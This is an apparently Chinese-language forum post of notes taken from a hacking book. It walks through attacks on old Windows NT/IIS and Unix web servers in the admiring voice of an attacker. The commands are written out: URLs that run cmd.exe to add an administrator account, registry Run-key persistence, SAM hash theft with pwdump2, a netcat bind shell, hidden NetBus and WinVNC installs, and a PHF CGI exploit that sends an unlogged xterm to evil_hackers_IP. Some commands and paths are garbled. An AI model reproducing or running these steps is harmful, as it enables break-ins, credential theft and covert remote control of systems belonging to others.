美國超級駭客的方法�

還在用木馬等魚兒上勾,然後用prot掃瞄,或偷窺icp漏洞,或是猜密碼,或放或寄病毒網頁 
等人打開來這些初等或中等的攻擊法嗎??美國駭客的實力真是另人無法想像, 

他們只需利用網址就能輕而意舉的主動攻擊了,情結不輸給電影,我們的手法 

對他們而言只是無須大驚小怪的小兒科......參考書為黑紅色的網路駭客與系統安全 

(好像有新版的,小皇是舊版的,名稱與外關差不多) 

書籍上的重點,作者是美國著名的網路安全專家, 


遠端緩衝區溢滿{buffer overflow} 
緩衝區溢滿是發生在程式沒有適當的檢查輸入內容的長度 
,而導致緩衝區空間不足,因此,任何預期之外的輸入,就會 
掩蓋掉CPU執行堆疊的其它部分. 
遠端執行命令取得系統管理者權限 
http://www.infowar.co.uk/mnemonix 
遠端執行一個批次檔執行任意的程式 
http://www.infowar.co.uk/mnemonix/Ntbufferoverruns.htm 


ISSHACK http://www.eeye.com 
在NT ISS網頁伺服器上執行程式碼 
在本機中可以給使一位使用者加入到區域的管理者群組中的擴權程式 

http://www.ntsecurity.net/security/getadmin.htm 
有相似功能的其它程式 sechole升級版是secholed 
http://www.ntsecurity.net/security/sechole.htm 
(Domain Admin group) 網域管理者(升級)群組 


cmd.exe NT命令解釋器 
ntuser 程式 用來修改使用者,群組和政策的程式,可參考 
http://www.pedestalsoftware.com 

Sechole的啟動可靠在一個瀏覽器輸入一個適當的URL連網目標系統,例如下列 

我們將Sechole上傳至/W3SVC/1/ROOT/SCRIPTS 
(這裡就是C:\inetpub\SCRIPTS) 
然後用下面的URL網址啟動它 
http://192.168.202.154/scripts/secholle.exe 
這樣做會成功的將IUSR_machine_name帳號加入管理者群組中,我們並沒有 

IUSR的密碼,因此我們為了要避免登入IUSR,通常是在目標系統上開個帳號, 

做法是利用ntuser公用程式透過瀏覽器執行下列複雜的URL(為了方便閱讀內容經過裝飾) 

http://192.168.202.154/scripts/cmd.exe?/c%20c:\C:\inetpub\scripts\ntuser.exe%20-s%20corpl%20add%20mallory%20-password%20secret 

以上%20再網語中是空白的意思,所以以上網址會被執行為 
(cmd /c 會送出ntuser命令到shell,在完成時終結自己) 
cmd /c ntuser -s <servername> add <username> -password 
<password> 
以上我們是以corpl做伺服機名稱,mallory是使用者名稱,secret當密碼, 

用類似的URL攻擊者可以用ntuser幫你把mallory加到管理者群組裡,如下 
(LORGUP是指某個區域群組) 
cmd /c ntuser -s <servername> LORGUP APPEND 
<groupname> <username>... 
http://192.168.202.154/scripts/cmd.exe?/c%20c:\C:\inetpub\scripts\ntuser.exe%20-s%20corpl%20lgroup%20Administrators%20mallory 

同機能的批次檔寫法如registry,cmd 
內容: net localgroup administrators <USER> /add 

安全系統ISS目錄和一些潛在可行的目錄 
http://www.iss.net/xforce/alerts/advise6.html 
以下/W3SVC/1/ROOT通常是指C:\Inetpub\還有News及Mail 
/W3SVC/1/ROOT/msade 
/W3SVC/1/ROOT/cgi-bin 
/W3SVC/1/ROOT/SCRIPTS 
/W3SVC/1/ROOT/ISSADMPWD 
/W3SVC/1/ROOT/_vti_bin 
/W3SVC/1/ROOT/_vti_bin/_vti_adm 
/W3SVC/1/ROOT/_vti_bin/_vti_aut 
(_vti_bin都是安裝Front Page之後衍生出來的) 

放批次檔的地方 
HKLM\software\Microsoft\CurrentVersion 
\RUN [any] 
\AeDebug Debugger 
\WinLogon Userinit 

------------------------------------------------------------ 


執行NT的NT Repair Disk Utility (rdisk) 
會在%SYSTEMROOT%\repair 
中產生一個壓縮過的SAM檔叫SAM._ ,還原法: C:\>expand 
SAM._ SAM 
NTFDOS:NTFS驅動軟體http://www.sysinternals.com 

可破SYSKEY的是Pwdump2 
http://www.webspan.net/~tas/pwdump2 
它可使用DLL注入的方法將自己的程式碼插入其它具有更高權限的行程中, 

一但注入更高權限的行程之後,這些惡質的執行碼就可以自由的內部呼叫API, 

來存取SYSKEY加密的密碼而不需將其解密. 
pwdump2所瞄準的高權限行程是lsass.exe,它是區域安全授權子系統, 

Pwd2是將自己注入到lsass的位址空間中,因此在執行Pwdump2之前必需動手 

找出lsass.exe的行程邊號(PID),以下是用NTRK裏的pulist公用程式並將 

輸出導向find找出lsass.exe的PID為50 
(以下C:\代表本機,D:\代表遠端主機) 
D:\>pulist | find "lsass" 
lsass.exe 50 NT AUTHORITY\SYSTEM 
現在Pwdump2可以使用PID 50來執行了,預設下會將它的輸出 
顯示在瑩慕上,可以很容意的導向一個檔案 
D:\>pwdump2 50 

ASCII無法顯示的字元Num Lock)ALT-255或ALT-129 

用AT執行遠端排程 (雙引號) 
C:\>at \\192.168.202.44 10:40P""remote /s cmd secret"" 

去除可用"[job id] /delete" 
遠端查時間c:>\sc \\192.168.202.44 start schedule 
sc.exe是可啟動排程服務 C:>\net time \\192.168.202.44 


以下D:\代表本機C:\代表遠端 
D:\>remote /c 192.168.202.44 
secret 
C:\>Dir winnt\repair\Sam._ 
C:\>@Q (結束用戶端) 
C:>\@k (結束伺服端) 
但remote不可啟動認何用到Win32 console API的程式 

remote.exe /C為用戶端 /S為伺服模式 

遠端監視抓取螢幕http://www.uk.research.att.com/vnc 
----------------------------- 
Netcat 
以下是使用command來聆聽 
-L 不會停止 
-d 暗中進行,不會有戶動的主控台 
-e 是指定啟動NT命令的解釋器, 
遠端為C:\TEMP\NC11NT 
-p 是指定聆聽的通訊阜 
C:\TEMP\NT11NT>nc -L -d -e cmd.exe -p 8080 
例 C:\TEMP\NT11NT>nc 192.168.202.44 8080 
D:\temp\regini -m \\192.168.202.44 netbus.txt 

NTRK中的regini.exe可以直接把必要的項目加入到遠端的Registry內 

REGINI讀取文字檔當做輸入來進行Registry的修改,所以我們必需建立一個 

Netbus.txt的檔案出來 
D:\temp\regini -m \\192.168.202.44 netbus.txt 
的檔案內容如下 !!!詳細請到書局查閱,不知有沒有抄正卻!!! 

HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus 
Server\Genera 
Accept=1 
TCPPort=80 
Visibility=3 在隱藏模式下執行 
AccessMode=2 
AutoStart=1 在windows啟動時執行 

HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus 
Server\Protection 
password=impossible 

WinVNC的用法第一部將必要檔複製到目標系統(winVNC.exe,VNCHooks.dll,OMNI 
THREAD_RT.DLL) 
2.設定使用此程式的密碼,建一個叫WINVNC.INI的檔案內容如下 

!!!詳細請到書局查閱,不知有沒有抄正卻!!! 
HKEY_USER\.DEFAULT\software\ORL\WinVNC3 
SocketConnect=REG_DWORD 
0x00000001 
password=REG_BINARY 0x00000008 

然後使用regini將這些值載入到遠端Registry內 
C:\>regini -m \\192.168.202.33 winvnc.ini 

NTRK的regdmp公用程式是可把Registry轉錄下來 

最後將winVNC安裝起來成為伺服程式並啟動它,下列的遠端命令,(記得這是遠端命令) 

C:\>WinVNC -install 
C:\>net start winvnc 

現在我門就可以啟動vncviewer程式並和我們的目標連線, 
下圖是設定連線到"顯示0"IP的位置,下一步是密碼 
___________________________________________ 
| vncSERVER |192.168.202.33.0 |v| 
=========================================== 

待續..... 

截取修改密碼http://www.ntsecurity.net/security/passworddll.html 

下例是可直接顯示原始碼,Netscape是存檔 
http://www.Company.com/scripts/files.asp::$DATE 
APS檔後面多加句點就有機會看見原始檔,或以16進位來破姐修正版 

http://www.Company.com/code/example.asp. 
http://www.Company.com/code/example%2easp 
-------------------------------------- 

一部機器的SID是一串數字,以S-1開頭,並以卵橫號分成好幾段,而最後一祖 

的數字稱為RID,對於NT內建的使用者與群組都有預先定意的RID, 

例如Administrator的RID碼一定都是500,而GUEST為501,駭客可用sid2user來找出 

已知SID和RID為500來找出管理者的帳號名稱(既使改過名稱) 
C:\>sid2user \\192.168.2.33 8915387 1645822062 18....5 
500 (S-1和短橫號是省略的) 
http://www.chem.msu.su:8080/~rudnyi/NT/sid.txt 
http://www.ntmag.com/Magazine/Article.cfm?ArtideID=3143 


----------------------------------------- 
最佳的xterm 
UNIX可在相容的機器上顯示X Window,也能透過prot 
-6063顯示在遠端的 
X伺服器上,然而加上-dispaly參數攻擊者可以將他自己的命令介面層導向自己 

的X伺服器,可以改良原PHF攻擊方式/cgi-bin/phf?Qalias=z%0a/bin/cat%20/etc/passwd 

既然攻擊者具有在網頁伺服器上執行遠端命令的能力,只要把這個攻擊稍微修改一下 

,就可以獲取交談式介面層存取,攻擊者要做的是將命令內容中的/bin/cat 

/etc/passwd 改成 /usr/X11R6/bin/xterm -ut -dispaly 
evil_hackers_IP:0.0 完整的命令如下: 
/cgi-bin/phf?Qalias=z%0a/usr/X11R6/bin/xterm%20-ut%20-dispaly%20evil_hackers_IP:0.0 

上面這個是在遠端的網頁伺服器就會執行xterm並且顯示在攻擊者(evil_hackers)的X伺服器上 

(視窗ID=0;螢幕ID=0),因為我們加上了-ut參數,因此這個動作並不會被系統記錄 

下來,這樣攻擊者跟本不需要登入任何伺服程式就可以獲得教談式介面層存取, 

通常我們會使用xterm的完整路徑,因為我們攻擊展開時,其PATH環境參數不一定設定 

符合我們的需求,使用完整路徑才能卻保網頁伺服器可以順利找到xterm執行檔 


=================================================== 

port service 
7 echo 
9 discard 
13 daytime 
19 Chargen 
21 ftp 
22 ssh 
23 telnet 
25 smtp 
25 smap 
37 time 
53 dns 
79 finger 
80 http 
110 pop3 
111 sunrpc 
139 netbois 
143 imap 
443 https 
512 exec 
513 login 
514 shell 
2049 nfs 
4045 lockd 
31337 UDP (BO) 
12345 TCP (NetBus) 
1394 DVD 
31337 unassigned 
12345 unassigned 

135-139 UPD和TCP/IP 

LINUX用網路結構探勘工具http://www.marko.net/cheops 
超級抓站軟體http://www.blighty.com/products/spade的Sam 
Spade還有Crawl,Website 
洩漏檔案內容,只要攻擊者知道檔案位置並以非標準的URL送出要求.... 

詳http://www.microsoft.com/security/bulletins/ms99-010.asp 


網路007 http://www.samspade.org/ 
作葉系統探知器Queso http://www.apostols.org/projectz/ 
網路源由結構圖http://www.visualroute.com的VisualRoute 
網路結構探索工具http://www.marko.net/cheops 
http://www.home.cs.utwente.ht/schoenw/scotty的Tkined原本是Scotty函式庫的一部份 

Nnmap的更新工具http://www.insecure.org:80/cgi-bin/nmap-submit.cgi 

http://www.remotelyanywhere.com網頁NT管理工具Remotely 
Anywhere 
2.Remotely Possible / Control IT 
http://www.cai.com的Control 
IT可在Windows,Linux,Solaris上用 
http://www.uk.research.att.com/Vnc 


queue處理器的佇列 
dual-homed兩棲主機 
HTML換行碼%0a 
HTML空格碼%20 
Virtual虛擬 
Private絲人 
back channel回傳通道 
,定意:一個通訊管道起始端為目標系統而非攻擊端 
shared library共享函式庫 
signal信號 
aliase化名